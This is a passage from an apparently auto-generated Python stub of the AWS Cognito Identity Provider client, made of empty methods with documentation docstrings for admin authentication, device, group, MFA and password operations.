* ``PASSWORD_VERIFIER`` : Next challenge is to supply ``PASSWORD_CLAIM_SIGNATURE`` , ``PASSWORD_CLAIM_SECRET_BLOCK`` , and ``TIMESTAMP`` after the client-side SRP calculations.
* ``CUSTOM_CHALLENGE`` : This is returned if your custom authentication flow determines that the user should pass another challenge before tokens are issued.
* ``DEVICE_SRP_AUTH`` : If device tracking was enabled on your user pool and the previous challenges were passed, this challenge is returned so that Amazon Cognito can start tracking this device.
* ``DEVICE_PASSWORD_VERIFIER`` : Similar to ``PASSWORD_VERIFIER`` , but for devices only.
* ``ADMIN_NO_SRP_AUTH`` : This is returned if you need to authenticate with ``USERNAME`` and ``PASSWORD`` directly. An app client must be enabled to use this flow.
* ``NEW_PASSWORD_REQUIRED`` : For users which are required to change their passwords after successful first login. This challenge should be passed with ``NEW_PASSWORD`` and any other required attributes.
- **Session** *(string) --*
The session which should be passed both ways in challenge-response calls to the service. If ``AdminInitiateAuth`` or ``AdminRespondToAuthChallenge`` API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next ``AdminRespondToAuthChallenge`` API call.
- **ChallengeParameters** *(dict) --*
The challenge parameters. These are returned to you in the ``AdminInitiateAuth`` response if you need to pass another challenge. The responses in this parameter should be used to compute inputs to the next call (``AdminRespondToAuthChallenge`` ).
All challenges require ``USERNAME`` and ``SECRET_HASH`` (if applicable).
The value of the ``USER_ID_FOR_SRP`` attribute will be the user's actual username, not an alias (such as email address or phone number), even if you specified an alias in your call to ``AdminInitiateAuth`` . This is because, in the ``AdminRespondToAuthChallenge`` API ``ChallengeResponses`` , the ``USERNAME`` attribute cannot be an alias.
- *(string) --*
- *(string) --*
- **AuthenticationResult** *(dict) --*
The result of the authentication response. This is only returned if the caller does not need to pass another challenge. If the caller does need to pass another challenge before it gets tokens, ``ChallengeName`` , ``ChallengeParameters`` , and ``Session`` are returned.
- **AccessToken** *(string) --*
The access token.
- **ExpiresIn** *(integer) --*
The expiration period of the authentication result in seconds.
- **TokenType** *(string) --*
The token type.
- **RefreshToken** *(string) --*
The refresh token.
- **IdToken** *(string) --*
The ID token.
- **NewDeviceMetadata** *(dict) --*
The new device metadata from an authentication result.
- **DeviceKey** *(string) --*
The device key.
- **DeviceGroupKey** *(string) --*
The device group key.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The ID of the Amazon Cognito user pool.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The app client ID.
:type AuthFlow: string
:param AuthFlow: **[REQUIRED]**
The authentication flow for this call to execute. The API action will depend on this value. For example:
* ``REFRESH_TOKEN_AUTH`` will take in a valid refresh token and return new tokens.
* ``USER_SRP_AUTH`` will take in ``USERNAME`` and ``SRP_A`` and return the SRP variables to be used for next challenge execution.
* ``USER_PASSWORD_AUTH`` will take in ``USERNAME`` and ``PASSWORD`` and return the next challenge or tokens.
Valid values include:
* ``USER_SRP_AUTH`` : Authentication flow for the Secure Remote Password (SRP) protocol.
* ``REFRESH_TOKEN_AUTH`` /``REFRESH_TOKEN`` : Authentication flow for refreshing the access token and ID token by supplying a valid refresh token.
* ``CUSTOM_AUTH`` : Custom authentication flow.
* ``ADMIN_NO_SRP_AUTH`` : Non-SRP authentication flow; you can pass in the USERNAME and PASSWORD directly if the flow is enabled for calling the app client.
* ``USER_PASSWORD_AUTH`` : Non-SRP authentication flow; USERNAME and PASSWORD are passed directly. If a user migration Lambda trigger is set, this flow will invoke the user migration Lambda if the USERNAME is not found in the user pool.
:type AuthParameters: dict
:param AuthParameters:
The authentication parameters. These are inputs corresponding to the ``AuthFlow`` that you are invoking. The required values depend on the value of ``AuthFlow`` :
* For ``USER_SRP_AUTH`` : ``USERNAME`` (required), ``SRP_A`` (required), ``SECRET_HASH`` (required if the app client is configured with a client secret), ``DEVICE_KEY``
* For ``REFRESH_TOKEN_AUTH/REFRESH_TOKEN`` : ``REFRESH_TOKEN`` (required), ``SECRET_HASH`` (required if the app client is configured with a client secret), ``DEVICE_KEY``
* For ``ADMIN_NO_SRP_AUTH`` : ``USERNAME`` (required), ``SECRET_HASH`` (if app client is configured with client secret), ``PASSWORD`` (required), ``DEVICE_KEY``
* For ``CUSTOM_AUTH`` : ``USERNAME`` (required), ``SECRET_HASH`` (if app client is configured with client secret), ``DEVICE_KEY``
- *(string) --*
- *(string) --*
:type ClientMetadata: dict
:param ClientMetadata:
This is a random key-value pair map which can contain any key and will be passed to your PreAuthentication Lambda trigger as-is. It can be used to implement additional validations around authentication.
- *(string) --*
- *(string) --*
:type AnalyticsMetadata: dict
:param AnalyticsMetadata:
The analytics metadata for collecting Amazon Pinpoint metrics for ``AdminInitiateAuth`` calls.
- **AnalyticsEndpointId** *(string) --*
The endpoint ID.
:type ContextData: dict
:param ContextData:
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
- **IpAddress** *(string) --* **[REQUIRED]**
Source IP address of your user.
- **ServerName** *(string) --* **[REQUIRED]**
Your server endpoint where this API is invoked.
- **ServerPath** *(string) --* **[REQUIRED]**
Your server path where this API is invoked.
- **HttpHeaders** *(list) --* **[REQUIRED]**
HttpHeaders received on your server in same order.
- *(dict) --*
The HTTP header.
- **headerName** *(string) --*
The header name
- **headerValue** *(string) --*
The header value.
- **EncodedData** *(string) --*
Encoded data containing device fingerprinting details, collected using the Amazon Cognito context data collection library.
:rtype: dict
:returns:
"""
pass
def admin_link_provider_for_user(self, UserPoolId: str, DestinationUser: Dict, SourceUser: Dict) -> Dict:
"""
Links an existing user account in a user pool (``DestinationUser`` ) to an identity from an external identity provider (``SourceUser`` ) based on a specified attribute name and value from the external identity provider. This allows you to create a link from the existing user account to an external federated user identity that has not yet been used to sign in, so that the federated user identity can be used to sign in as the existing user account.
For example, if there is an existing user with a username and password, this API links that user to a federated user identity, so that when the federated user identity is used, the user signs in as the existing user account.
.. warning::
Because this API allows a user with an external federated identity to sign in as an existing user in the user pool, it is critical that it only be used with external identity providers and provider attributes that have been trusted by the application owner.
See also .
This action is enabled only for admin access and requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminLinkProviderForUser>`_
**Request Syntax**
::
response = client.admin_link_provider_for_user(
UserPoolId='string',
DestinationUser={
'ProviderName': 'string',
'ProviderAttributeName': 'string',
'ProviderAttributeValue': 'string'
},
SourceUser={
'ProviderName': 'string',
'ProviderAttributeName': 'string',
'ProviderAttributeValue': 'string'
}
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type DestinationUser: dict
:param DestinationUser: **[REQUIRED]**
The existing user in the user pool to be linked to the external identity provider user account. Can be a native (Username + Password) Cognito User Pools user or a federated user (for example, a SAML or Facebook user). If the user doesn\'t exist, an exception is thrown. This is the user that is returned when the new user (with the linked identity provider attribute) signs in.
For a native username + password user, the ``ProviderAttributeValue`` for the ``DestinationUser`` should be the username in the user pool. For a federated user, it should be the provider-specific ``user_id`` .
The ``ProviderAttributeName`` of the ``DestinationUser`` is ignored.
The ``ProviderName`` should be set to ``Cognito`` for users in Cognito user pools.
- **ProviderName** *(string) --*
The name of the provider, for example, Facebook, Google, or Login with Amazon.
- **ProviderAttributeName** *(string) --*
The name of the provider attribute to link to, for example, ``NameID`` .
- **ProviderAttributeValue** *(string) --*
The value of the provider attribute to link to, for example, ``xxxxx_account`` .
:type SourceUser: dict
:param SourceUser: **[REQUIRED]**
An external identity provider account for a user who does not currently exist yet in the user pool. This user must be a federated user (for example, a SAML or Facebook user), not another native user.
If the ``SourceUser`` is a federated social identity provider user (Facebook, Google, or Login with Amazon), you must set the ``ProviderAttributeName`` to ``Cognito_Subject`` . For social identity providers, the ``ProviderName`` will be ``Facebook`` , ``Google`` , or ``LoginWithAmazon`` , and Cognito will automatically parse the Facebook, Google, and Login with Amazon tokens for ``id`` , ``sub`` , and ``user_id`` , respectively. The ``ProviderAttributeValue`` for the user must be the same value as the ``id`` , ``sub`` , or ``user_id`` value found in the social identity provider token.
For SAML, the ``ProviderAttributeName`` can be any value that matches a claim in the SAML assertion. If you wish to link SAML users based on the subject of the SAML assertion, you should map the subject to a claim through the SAML identity provider and submit that claim name as the ``ProviderAttributeName`` . If you set ``ProviderAttributeName`` to ``Cognito_Subject`` , Cognito will automatically parse the default unique identifier found in the subject from the SAML token.
- **ProviderName** *(string) --*
The name of the provider, for example, Facebook, Google, or Login with Amazon.
- **ProviderAttributeName** *(string) --*
The name of the provider attribute to link to, for example, ``NameID`` .
- **ProviderAttributeValue** *(string) --*
The value of the provider attribute to link to, for example, ``xxxxx_account`` .
:rtype: dict
:returns:
"""
pass
def admin_list_devices(self, UserPoolId: str, Username: str, Limit: int = None, PaginationToken: str = None) -> Dict:
"""
Lists devices, as an administrator.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminListDevices>`_
**Request Syntax**
::
response = client.admin_list_devices(
UserPoolId='string',
Username='string',
Limit=123,
PaginationToken='string'
)
**Response Syntax**
::
{
'Devices': [
{
'DeviceKey': 'string',
'DeviceAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'DeviceCreateDate': datetime(2015, 1, 1),
'DeviceLastModifiedDate': datetime(2015, 1, 1),
'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
},
],
'PaginationToken': 'string'
}
**Response Structure**
- *(dict) --*
Lists the device's response, as an administrator.
- **Devices** *(list) --*
The devices in the list of devices response.
- *(dict) --*
The device type.
- **DeviceKey** *(string) --*
The device key.
- **DeviceAttributes** *(list) --*
The device attributes.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --*
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
- **DeviceCreateDate** *(datetime) --*
The creation date of the device.
- **DeviceLastModifiedDate** *(datetime) --*
The last modified date of the device.
- **DeviceLastAuthenticatedDate** *(datetime) --*
The date in which the device was last authenticated.
- **PaginationToken** *(string) --*
The pagination token.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type Username: string
:param Username: **[REQUIRED]**
The user name.
:type Limit: integer
:param Limit:
The limit of the devices request.
:type PaginationToken: string
:param PaginationToken:
The pagination token.
:rtype: dict
:returns:
"""
pass
def admin_list_groups_for_user(self, Username: str, UserPoolId: str, Limit: int = None, NextToken: str = None) -> Dict:
"""
Lists the groups that the user belongs to.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminListGroupsForUser>`_
**Request Syntax**
::
response = client.admin_list_groups_for_user(
Username='string',
UserPoolId='string',
Limit=123,
NextToken='string'
)
**Response Syntax**
::
{
'Groups': [
{
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **Groups** *(list) --*
The groups that the user belongs to.
- *(dict) --*
The group type.
- **GroupName** *(string) --*
The name of the group.
- **UserPoolId** *(string) --*
The user pool ID for the user pool.
- **Description** *(string) --*
A string containing the description of the group.
- **RoleArn** *(string) --*
The role ARN for the group.
- **Precedence** *(integer) --*
A nonnegative integer value that specifies the precedence of this group relative to the other groups that a user can belong to in the user pool. If a user belongs to two or more groups, it is the group with the highest precedence whose role ARN will be used in the ``cognito:roles`` and ``cognito:preferred_role`` claims in the user's tokens. Groups with higher ``Precedence`` values take precedence over groups with lower ``Precedence`` values or with null ``Precedence`` values.
Two groups can have the same ``Precedence`` value. If this happens, neither group takes precedence over the other. If two groups with the same ``Precedence`` have the same role ARN, that role is used in the ``cognito:preferred_role`` claim in tokens for users in each group. If the two groups have different role ARNs, the ``cognito:preferred_role`` claim is not set in users' tokens.
The default ``Precedence`` value is null.
- **LastModifiedDate** *(datetime) --*
The date the group was last modified.
- **CreationDate** *(datetime) --*
The date the group was created.
- **NextToken** *(string) --*
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type Username: string
:param Username: **[REQUIRED]**
The username for the user.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type Limit: integer
:param Limit:
The limit of the request to list groups.
:type NextToken: string
:param NextToken:
An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:rtype: dict
:returns:
"""
pass
def admin_list_user_auth_events(self, UserPoolId: str, Username: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Lists a history of user activity and any risks detected as part of Amazon Cognito advanced security.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminListUserAuthEvents>`_
**Request Syntax**
::
response = client.admin_list_user_auth_events(
UserPoolId='string',
Username='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'AuthEvents': [
{
'EventId': 'string',
'EventType': 'SignIn'|'SignUp'|'ForgotPassword',
'CreationDate': datetime(2015, 1, 1),
'EventResponse': 'Success'|'Failure',
'EventRisk': {
'RiskDecision': 'NoRisk'|'AccountTakeover'|'Block',
'RiskLevel': 'Low'|'Medium'|'High'
},
'ChallengeResponses': [
{
'ChallengeName': 'Password'|'Mfa',
'ChallengeResponse': 'Success'|'Failure'
},
],
'EventContextData': {
'IpAddress': 'string',
'DeviceName': 'string',
'Timezone': 'string',
'City': 'string',
'Country': 'string'
},
'EventFeedback': {
'FeedbackValue': 'Valid'|'Invalid',
'Provider': 'string',
'FeedbackDate': datetime(2015, 1, 1)
}
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **AuthEvents** *(list) --*
The response object. It includes the ``EventID`` , ``EventType`` , ``CreationDate`` , ``EventRisk`` , and ``EventResponse`` .
- *(dict) --*
The authentication event type.
- **EventId** *(string) --*
The event ID.
- **EventType** *(string) --*
The event type.
- **CreationDate** *(datetime) --*
The creation date
- **EventResponse** *(string) --*
The event response.
- **EventRisk** *(dict) --*
The event risk.
- **RiskDecision** *(string) --*
The risk decision.
- **RiskLevel** *(string) --*
The risk level.
- **ChallengeResponses** *(list) --*
The challenge responses.
- *(dict) --*
The challenge response type.
- **ChallengeName** *(string) --*
The challenge name
- **ChallengeResponse** *(string) --*
The challenge response.
- **EventContextData** *(dict) --*
The user context data captured at the time of an event request. It provides additional information about the client from which event the request is received.
- **IpAddress** *(string) --*
The user's IP address.
- **DeviceName** *(string) --*
The user's device name.
- **Timezone** *(string) --*
The user's time zone.
- **City** *(string) --*
The user's city.
- **Country** *(string) --*
The user's country.
- **EventFeedback** *(dict) --*
A flag specifying the user feedback captured at the time of an event request is good or bad.
- **FeedbackValue** *(string) --*
The event feedback value.
- **Provider** *(string) --*
The provider.
- **FeedbackDate** *(datetime) --*
The event feedback date.
- **NextToken** *(string) --*
A pagination token.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type Username: string
:param Username: **[REQUIRED]**
The user pool username or an alias.
:type MaxResults: integer
:param MaxResults:
The maximum number of authentication events to return.
:type NextToken: string
:param NextToken:
A pagination token.
:rtype: dict
:returns:
"""
pass
def admin_remove_user_from_group(self, UserPoolId: str, Username: str, GroupName: str):
"""
Removes the specified user from the specified group.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminRemoveUserFromGroup>`_
**Request Syntax**
::
response = client.admin_remove_user_from_group(
UserPoolId='string',
Username='string',
GroupName='string'
)
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type Username: string
:param Username: **[REQUIRED]**
The username for the user.
:type GroupName: string
:param GroupName: **[REQUIRED]**
The group name.
:returns: None
"""
pass
def admin_reset_user_password(self, UserPoolId: str, Username: str) -> Dict:
"""
Resets the specified user's password in a user pool as an administrator. Works on any user.
When a developer calls this API, the current password is invalidated, so it must be changed. If a user tries to sign in after the API is called, the app will get a PasswordResetRequiredException exception back and should direct the user down the flow to reset the password, which is the same as the forgot password flow. In addition, if the user pool has phone verification selected and a verified phone number exists for the user, or if email verification is selected and a verified email exists for the user, calling this API will also result in sending a message to the end user with the code to change their password.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminResetUserPassword>`_
**Request Syntax**
::
response = client.admin_reset_user_password(
UserPoolId='string',
Username='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server to reset a user password as an administrator.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to reset the user\'s password.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user whose password you wish to reset.
:rtype: dict
:returns:
"""
pass
def admin_respond_to_auth_challenge(self, UserPoolId: str, ClientId: str, ChallengeName: str, ChallengeResponses: Dict = None, Session: str = None, AnalyticsMetadata: Dict = None, ContextData: Dict = None) -> Dict:
"""
Responds to an authentication challenge, as an administrator.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminRespondToAuthChallenge>`_
**Request Syntax**
::
response = client.admin_respond_to_auth_challenge(
UserPoolId='string',
ClientId='string',
ChallengeName='SMS_MFA'|'SOFTWARE_TOKEN_MFA'|'SELECT_MFA_TYPE'|'MFA_SETUP'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
ChallengeResponses={
'string': 'string'
},
Session='string',
AnalyticsMetadata={
'AnalyticsEndpointId': 'string'
},
ContextData={
'IpAddress': 'string',
'ServerName': 'string',
'ServerPath': 'string',
'HttpHeaders': [
{
'headerName': 'string',
'headerValue': 'string'
},
],
'EncodedData': 'string'
}
)
**Response Syntax**
::
{
'ChallengeName': 'SMS_MFA'|'SOFTWARE_TOKEN_MFA'|'SELECT_MFA_TYPE'|'MFA_SETUP'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
'Session': 'string',
'ChallengeParameters': {
'string': 'string'
},
'AuthenticationResult': {
'AccessToken': 'string',
'ExpiresIn': 123,
'TokenType': 'string',
'RefreshToken': 'string',
'IdToken': 'string',
'NewDeviceMetadata': {
'DeviceKey': 'string',
'DeviceGroupKey': 'string'
}
}
}
**Response Structure**
- *(dict) --*
Responds to the authentication challenge, as an administrator.
- **ChallengeName** *(string) --*
The name of the challenge. For more information, see .
- **Session** *(string) --*
The session which should be passed both ways in challenge-response calls to the service. If the or API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next ``RespondToAuthChallenge`` API call.
- **ChallengeParameters** *(dict) --*
The challenge parameters. For more information, see .
- *(string) --*
- *(string) --*
- **AuthenticationResult** *(dict) --*
The result returned by the server in response to the authentication request.
- **AccessToken** *(string) --*
The access token.
- **ExpiresIn** *(integer) --*
The expiration period of the authentication result in seconds.
- **TokenType** *(string) --*
The token type.
- **RefreshToken** *(string) --*
The refresh token.
- **IdToken** *(string) --*
The ID token.
- **NewDeviceMetadata** *(dict) --*
The new device metadata from an authentication result.
- **DeviceKey** *(string) --*
The device key.
- **DeviceGroupKey** *(string) --*
The device group key.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The ID of the Amazon Cognito user pool.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The app client ID.
:type ChallengeName: string
:param ChallengeName: **[REQUIRED]**
The challenge name. For more information, see .
:type ChallengeResponses: dict
:param ChallengeResponses:
The challenge responses. These are inputs corresponding to the value of ``ChallengeName`` , for example:
* ``SMS_MFA`` : ``SMS_MFA_CODE`` , ``USERNAME`` , ``SECRET_HASH`` (if app client is configured with client secret).
* ``PASSWORD_VERIFIER`` : ``PASSWORD_CLAIM_SIGNATURE`` , ``PASSWORD_CLAIM_SECRET_BLOCK`` , ``TIMESTAMP`` , ``USERNAME`` , ``SECRET_HASH`` (if app client is configured with client secret).
* ``ADMIN_NO_SRP_AUTH`` : ``PASSWORD`` , ``USERNAME`` , ``SECRET_HASH`` (if app client is configured with client secret).
* ``NEW_PASSWORD_REQUIRED`` : ``NEW_PASSWORD`` , any other required attributes, ``USERNAME`` , ``SECRET_HASH`` (if app client is configured with client secret).
The value of the ``USERNAME`` attribute must be the user\'s actual username, not an alias (such as email address or phone number). To make this easier, the ``AdminInitiateAuth`` response includes the actual username value in the ``USERNAMEUSER_ID_FOR_SRP`` attribute, even if you specified an alias in your call to ``AdminInitiateAuth`` .
- *(string) --*
- *(string) --*
:type Session: string
:param Session:
The session which should be passed both ways in challenge-response calls to the service. If ``InitiateAuth`` or ``RespondToAuthChallenge`` API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next ``RespondToAuthChallenge`` API call.
:type AnalyticsMetadata: dict
:param AnalyticsMetadata:
The analytics metadata for collecting Amazon Pinpoint metrics for ``AdminRespondToAuthChallenge`` calls.
- **AnalyticsEndpointId** *(string) --*
The endpoint ID.
:type ContextData: dict
:param ContextData:
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
- **IpAddress** *(string) --* **[REQUIRED]**
Source IP address of your user.
- **ServerName** *(string) --* **[REQUIRED]**
Your server endpoint where this API is invoked.
- **ServerPath** *(string) --* **[REQUIRED]**
Your server path where this API is invoked.
- **HttpHeaders** *(list) --* **[REQUIRED]**
HttpHeaders received on your server in same order.
- *(dict) --*
The HTTP header.
- **headerName** *(string) --*
The header name
- **headerValue** *(string) --*
The header value.
- **EncodedData** *(string) --*
Encoded data containing device fingerprinting details, collected using the Amazon Cognito context data collection library.
:rtype: dict
:returns:
"""
pass
def admin_set_user_mfa_preference(self, Username: str, UserPoolId: str, SMSMfaSettings: Dict = None, SoftwareTokenMfaSettings: Dict = None) -> Dict:
"""
Sets the user's multi-factor authentication (MFA) preference.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminSetUserMFAPreference>`_
**Request Syntax**
::
response = client.admin_set_user_mfa_preference(
SMSMfaSettings={
'Enabled': True|False,
'PreferredMfa': True|False
},
SoftwareTokenMfaSettings={
'Enabled': True|False,
'PreferredMfa': True|False
},
Username='string',
UserPoolId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type SMSMfaSettings: dict
:param SMSMfaSettings:
The SMS text message MFA settings.
- **Enabled** *(boolean) --*
Specifies whether SMS text message MFA is enabled.
- **PreferredMfa** *(boolean) --*
The preferred MFA method.
:type SoftwareTokenMfaSettings: dict
:param SoftwareTokenMfaSettings:
The time-based one-time password software token MFA settings.
- **Enabled** *(boolean) --*
Specifies whether software token MFA is enabled.
- **PreferredMfa** *(boolean) --*
The preferred MFA method.
:type Username: string
:param Username: **[REQUIRED]**
The user pool username or alias.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:rtype: dict
:returns:
"""
pass
def admin_set_user_settings(self, UserPoolId: str, Username: str, MFAOptions: List) -> Dict:
"""
Sets all the user settings for a specified user name. Works on any user.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminSetUserSettings>`_
**Request Syntax**
::
response = client.admin_set_user_settings(
UserPoolId='string',
Username='string',
MFAOptions=[
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server to set user settings as an administrator.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to set the user\'s settings, such as MFA options.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user for whom you wish to set user settings.
:type MFAOptions: list
:param MFAOptions: **[REQUIRED]**
Specifies the options for MFA (e.g., email or phone number).
- *(dict) --*
Specifies the different settings for multi-factor authentication (MFA).
- **DeliveryMedium** *(string) --*
The delivery medium (email message or SMS message) to send the MFA code.
- **AttributeName** *(string) --*
The attribute name of the MFA option type.
:rtype: dict
:returns:
"""
pass
def admin_update_auth_event_feedback(self, UserPoolId: str, Username: str, EventId: str, FeedbackValue: str) -> Dict:
"""
Provides feedback for an authentication event as to whether it was from a valid user. This feedback is used for improving the risk evaluation decision for the user pool as part of Amazon Cognito advanced security.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminUpdateAuthEventFeedback>`_
**Request Syntax**
::
response = client.admin_update_auth_event_feedback(
UserPoolId='string',
Username='string',
EventId='string',
FeedbackValue='Valid'|'Invalid'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type Username: string
:param Username: **[REQUIRED]**
The user pool username.
:type EventId: string
:param EventId: **[REQUIRED]**
The authentication event ID.
:type FeedbackValue: string
:param FeedbackValue: **[REQUIRED]**
The authentication event feedback value.
:rtype: dict
:returns:
"""
pass
def admin_update_device_status(self, UserPoolId: str, Username: str, DeviceKey: str, DeviceRememberedStatus: str = None) -> Dict:
"""
Updates the device status as an administrator.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminUpdateDeviceStatus>`_
**Request Syntax**
::
response = client.admin_update_device_status(
UserPoolId='string',
Username='string',
DeviceKey='string',
DeviceRememberedStatus='remembered'|'not_remembered'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
The status response from the request to update the device, as an administrator.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type Username: string
:param Username: **[REQUIRED]**
The user name.
:type DeviceKey: string
:param DeviceKey: **[REQUIRED]**
The device key.
:type DeviceRememberedStatus: string
:param DeviceRememberedStatus:
The status indicating whether a device has been remembered or not.
:rtype: dict
:returns:
"""
pass
def admin_update_user_attributes(self, UserPoolId: str, Username: str, UserAttributes: List) -> Dict:
"""
Updates the specified user's attributes, including developer attributes, as an administrator. Works on any user.
For custom attributes, you must prepend the ``custom:`` prefix to the attribute name.
In addition to updating user attributes, this API can also be used to mark phone and email as verified.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminUpdateUserAttributes>`_
**Request Syntax**
::
response = client.admin_update_user_attributes(
UserPoolId='string',
Username='string',
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server for the request to update user attributes as an administrator.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to update user attributes.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user for whom you want to update user attributes.
:type UserAttributes: list
:param UserAttributes: **[REQUIRED]**
An array of name-value pairs representing user attributes.
For custom attributes, you must prepend the ``custom:`` prefix to the attribute name.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --* **[REQUIRED]**
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
:rtype: dict
:returns:
"""
pass
def admin_user_global_sign_out(self, UserPoolId: str, Username: str) -> Dict:
"""
Signs out users from all devices, as an administrator.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminUserGlobalSignOut>`_
**Request Syntax**
::
response = client.admin_user_global_sign_out(
UserPoolId='string',
Username='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
The global sign-out response, as an administrator.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type Username: string
:param Username: **[REQUIRED]**
The user name.
:rtype: dict
:returns:
"""
pass
def associate_software_token(self, AccessToken: str = None, Session: str = None) -> Dict:
"""
Returns a unique generated shared secret key code for the user account. The request takes an access token or a session string, but not both.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AssociateSoftwareToken>`_
**Request Syntax**
::
response = client.associate_software_token(
AccessToken='string',
Session='string'
)
**Response Syntax**
::
{
'SecretCode': 'string',
'Session': 'string'
}
**Response Structure**
- *(dict) --*
- **SecretCode** *(string) --*
A unique generated shared secret code that is used in the TOTP algorithm to generate a one time code.
- **Session** *(string) --*
The session which should be passed both ways in challenge-response calls to the service. This allows authentication of the user as part of the MFA setup process.
:type AccessToken: string
:param AccessToken:
The access token.
:type Session: string
:param Session:
The session which should be passed both ways in challenge-response calls to the service. This allows authentication of the user as part of the MFA setup process.
:rtype: dict
:returns:
"""
pass
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def change_password(self, PreviousPassword: str, ProposedPassword: str, AccessToken: str) -> Dict:
"""
Changes the password for a specified user in a user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ChangePassword>`_
**Request Syntax**
::
response = client.change_password(
PreviousPassword='string',
ProposedPassword='string',
AccessToken='string'
)
